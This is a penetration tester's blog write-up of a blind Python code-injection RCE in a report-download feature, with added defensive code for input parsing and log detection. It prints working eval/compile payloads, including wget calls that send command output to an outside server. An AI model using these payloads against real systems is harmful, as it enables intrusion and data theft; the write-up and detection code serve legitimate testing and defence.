How I found a Blind Remote Code Execution vulnerability

vivek chauhan
5 min read · Aug 4, 2020


Introduction

In this post I am going to explain how to detect a Blind RCE vulnerability and how it can be exploited. I encountered this bug during one of my vulnerability assessment and penetration testing engagements and am using it as the example.

What is Blind RCE?

This vulnerability occurs when an attacker can execute malicious code or commands on a target machine, but the output of the executed command/code is not displayed in the response. The simplest way to validate a Blind Remote Code Execution is to execute a sleep command and check whether the application actually waits for the specified time before returning the response.
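To make the vulnerable pattern concrete, here is an added illustration (not code from the original post, and not the source of the application that was tested): a hypothetical report-filter function that passes a user-supplied expression to eval(), next to a hardened version that only accepts a single `field == literal` or `field != literal` comparison, checked node by node with the ast module. The rows, field names and function names are constructed for the example.

```python
import ast
import operator

# Constructed sample rows standing in for the CSV report the application exports.
ROWS = [
    {"id": 1, "status": "open", "owner": "alice"},
    {"id": 2, "status": "closed", "owner": "bob"},
    {"id": 3, "status": "open", "owner": "carol"},
]


def filter_rows_vulnerable(rows, expr):
    """Vulnerable pattern (hypothetical): the filter expression arrives in a request
    parameter and is handed to eval() with the row fields as local names. Any Python
    the caller sends runs on the server, and because only the matching rows are
    returned, nothing the injected code produces reaches the response: the code
    execution is blind, which is why a sleep is the first thing that proves it."""
    return [row for row in rows if eval(expr, {}, dict(row))]


# Hardened version: an explicit allow-list of fields and operators, and a parser
# that rejects anything other than one comparison of a field with a literal.
ALLOWED_OPS = {ast.Eq: operator.eq, ast.NotEq: operator.ne}
ALLOWED_FIELDS = {"id", "status", "owner"}


def parse_filter(expr):
    """Return (field, op, value) for `field == literal` / `field != literal`;
    raise ValueError for everything else (calls, attribute access, statements,
    names on the right-hand side, unknown fields, unsupported operators)."""
    try:
        tree = ast.parse(expr, mode="eval")  # statements such as `for`/`import` fail here
    except (SyntaxError, ValueError):
        raise ValueError("filter must be a single expression")
    node = tree.body
    if not (isinstance(node, ast.Compare) and len(node.ops) == 1 and len(node.comparators) == 1):
        raise ValueError("only a single comparison is allowed")
    op = ALLOWED_OPS.get(type(node.ops[0]))
    if op is None:
        raise ValueError("operator not allowed")
    left = node.left
    if not (isinstance(left, ast.Name) and left.id in ALLOWED_FIELDS):
        raise ValueError("unknown field")
    right = node.comparators[0]
    if not (isinstance(right, ast.Constant) and isinstance(right.value, (str, int))):
        raise ValueError("value must be a string or integer literal")
    return left.id, op, right.value


def filter_rows_hardened(rows, expr):
    """Same feature as the vulnerable version, but no Python is ever executed:
    the comparison is applied with operator.eq/operator.ne on plain values."""
    field, op, value = parse_filter(expr)
    return [row for row in rows if op(row[field], value)]


def is_safe_filter(expr):
    """True if the hardened parser accepts the expression, False otherwise."""
    try:
        parse_filter(expr)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print(filter_rows_hardened(ROWS, "status == 'open'"))
    for probe in ("len(status) == 4", "__import__('time').sleep(20)"):
        print(probe, "->", "accepted" if is_safe_filter(probe) else "rejected")
```

The point of the hardened version is that it never calls eval() or exec() on anything derived from the request; if a feature genuinely needs an expression language, parse it into a small allow-listed AST as above rather than trying to filter dangerous strings out of Python source.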

At first glance the application looked very simple; there were no fancy options to test.

The application had a file download option where you could download a report in CSV format.

So I fired up the web application testing tool “Burp Suite” and started intercepting requests and responses (I assume you already know the basic usage of Burp).

Everything looked normal, but one thing caught my attention: the responses revealed Python 2.7.13, and the application was using Werkzeug.

Werkzeug is a “Web Server Gateway Interface” (WSGI) toolkit. WSGI is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process one request.

I started with automated tests: brute-forcing parameters with different payloads from my payload list and several fuzzing runs, which either got my IP address blocked for a few minutes, gave me an empty output with a 200 or 404 response, or sometimes returned a 408 Request Timeout. After a while I got tired of the same process and forged a request with empty parameters, and again got a 500 Internal Server Error.

Then I got the idea of charting every error response I was getting against the payload list. It took some time, but once I had a full chart of payloads vs. errors I noticed that all Python-related payloads produced 500 Internal Server Errors, while payloads for the other technologies (PHP, ASP.NET, Ruby and Perl) produced 200 (empty output) or 400-range errors. From this I deduced that I had to focus on Python-based payloads.

Now I collected my 5–6 unique Python-based RCE payloads and created around 40–50 new payloads out of them using different types of encoding and WAF bypass techniques.

I then used this list to fuzz the same parameter with the help of Burp Intruder.

Once the test was finished I noticed that some payloads returned 200 (empty response) or 400-range errors and some again returned 500 Internal Server Errors. So I started by analysing the 500 responses first, and noticed that all payloads containing a sleep function showed a delay in the response.

Then I used Burp Repeater and tried to recreate the sleep request by running Python code injection RCE payloads with 5, 10 and 15 second sleeps, and I got responses delayed by 5, 10 and 15 seconds respectively (you can see the response time in the bottom right corner of Burp Suite). I sent a few more requests with different time delays and each response came back after the specified delay. Now I could control the response time, but the problem was that when I tried to run any command, the application did not display the command output in the response.

POC Code: eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29
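From the defender's side, this kind of sleep-based probing leaves a recognisable trace in the access log: Python code-injection markers in a URL-decoded parameter, a 500 status, and a response time that matches the requested sleep. Below is an added example (not from the original post) that scans a few constructed access-log lines and reports requests matching those signals. The log format is assumed: common-log style with a trailing response time in seconds, so adjust the regex for your own server; the IP addresses and timestamps are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines (assumed format: common log + response time in seconds).
# Line 2 carries the URL-encoded sleep probe from the post, line 4 a shorter
# import-based probe, line 3 an unrelated XSS probe, line 5 a slow error with no payload.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Aug/2020:10:00:01 +0000] "GET /report?format=csv&filter=status%3D%3Dopen HTTP/1.1" 200 4231 0.021
10.0.0.9 - - [04/Aug/2020:10:00:07 +0000] "GET /report?format=csv&filter=eval%28compile%28%27for%20x%20in%20range%281%29%3A%0A%20import%20time%0A%20time.sleep%2820%29%27%2C%27a%27%2C%27single%27%29%29 HTTP/1.1" 500 290 20.034
10.0.0.9 - - [04/Aug/2020:10:00:31 +0000] "GET /report?format=csv&filter=%3Cscript%3Ealert%281%29%3C%2Fscript%3E HTTP/1.1" 200 0 0.018
10.0.0.9 - - [04/Aug/2020:10:01:02 +0000] "GET /report?format=csv&filter=__import__%28%27os%27%29.popen%28%27ls%27%29 HTTP/1.1" 500 290 0.030
10.0.0.7 - - [04/Aug/2020:10:01:40 +0000] "GET /report?format=csv HTTP/1.1" 500 290 9.812
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<secs>[\d.]+)$'
)

# Substrings that have no business in a report-filter parameter of a Python app.
# All lower-case; parameter values are lower-cased before matching.
CODE_INJECTION_MARKERS = (
    "eval(", "compile(", "exec(", "__import__", "os.popen", "os.system",
    "subprocess", "time.sleep", "import os", "import time",
)
SLOW_SECONDS = 5.0  # threshold for "suspiciously slow"; tune to the application


def decode_params(target):
    """Split the request target's query string into (name, value) pairs.
    parse_qsl percent-decodes values once, so %0A becomes a real newline and
    %28 a '(' before the markers are checked."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    for name, value in decode_params(m["target"]):
        hits = [mk for mk in CODE_INJECTION_MARKERS if mk in value.lower()]
        if hits:
            reasons.append(f"code-injection marker(s) {hits} in parameter '{name}'")
    if not reasons:
        return None  # no marker: slow or failing requests alone are not flagged here
    secs = float(m["secs"])
    status = int(m["status"])
    if secs >= SLOW_SECONDS:
        reasons.append(f"response took {secs:.1f}s, consistent with a time-based probe")
    if status == 500:
        reasons.append("server error on the suspicious parameter (exception while evaluating?)")
    return {"ip": m["ip"], "ts": m["ts"], "status": status, "secs": secs, "reasons": reasons}


def scan_log(text):
    """Run analyze_line over every line and keep the findings, in log order."""
    return [f for f in (analyze_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["secs"], *finding["reasons"], sep="\n  ")
```

The last sample line (a slow 500 with no payload) is deliberately not flagged: on its own a slow error is too noisy a signal. In practice you would correlate such lines with marker hits from the same client within a short window, and treat a marker hit whose delay tracks the number inside the sleep call as a confirmed probe rather than a scanner false positive.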

Now I was sure the application was vulnerable to RCE, but we needed a proper POC: a time-delay POC alone is not going to get the client to pay my coffee bills.

There are two ways to do this, but both work only if the server is allowed to make outbound connections.

1) Run the ping command and capture the ICMP requests with tcpdump

2) Run a Python HTTP server and capture the incoming request

I went with the 2nd option: I started my Python server, ran the command mentioned below, and Boommmmm… we got a hit.

We could now have executed a Metasploit payload and got a reverse shell, but the client did not allow executing any malicious code on the server.

POC Code: eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://vpsip.com:8000').read()""",'','single'))

OK, we can solve this problem by redirecting the command output into a file, so I wrote a simple PHP script which opens a txt file and writes the command output into it. Looks good, let's check it.

Time for the final check.

POC Code: eval(compile("""for x in range(1):\n import os\n os.popen(r'wget http://vpsip.com:8000/shell.php?cmd="$(ls -la)"').read()""",'','single'))

Voila..!!! Everything worked perfectly and we got the command output in the text file.

Final POC done!!! Mission Accomplished

Thanks to my team: Raghav Bisht, Deepankar Arora

Happy Hacking!

Vivek Chauhan

Tool I used: https://portswigger.net/burp/communitydownload

https://portswigger.net/web-security/os-command-injection

https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection

